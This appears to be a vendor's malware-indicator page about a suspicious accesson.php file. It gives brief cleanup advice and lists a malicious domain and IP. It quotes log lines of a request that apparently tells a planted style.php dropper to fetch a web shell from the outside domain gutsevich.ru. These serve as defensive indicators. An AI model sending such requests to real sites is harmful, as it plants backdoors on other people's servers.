If you’ve discovered a suspicious accesson.php PHP file on your website or server, it’s important to take action to investigate and address the issue – your site is likely infected with malware.
To restore a clean site version, you may follow the steps described here:
https://guides.magefix.com/2021/06/clean-driverfortnigtly-malware/
Also, you can move all the suspicious PHP files to a quarantine or backup directory with no public access. This will prevent it from being executed and causing further harm.
MAGEFIX SecurityMalware cleanup & protectionTry our free site check.
Malicious logs associated with accesson.php.
46.97.198.136 – – [09/Jul/2021:21:56:13 +0000] “GET /style.php?sig=shell519&file_name=accesson.php&domain=gutsevich.ru&shell_file=accesson20 HTTP/1.1” 403 358 “https://.com/” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:48.0) Gecko/20100101 Firefox/48.0” .com 162.241.85.120
46.97.198.136 – – [09/Jul/2021:21:56:15 +0000] “GET /accesson.php HTTP/1.1” 403 358 “https://.com/style.php?sig=shell519&file_name=accesson.php&domain=gutsevich.ru&shell_file=accesson20” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:48.0) Gecko/20100101 Firefox/48.0” .com
Malicious domains: gutsevich.ru.
Malicious IPs: 188.225.40.162
If you are unsure about how to proceed or lack the technical expertise, consider seeking assistance from a security professional or your hosting provider’s support team. We can also help you with a more in-depth analysis and resolution of the security issue.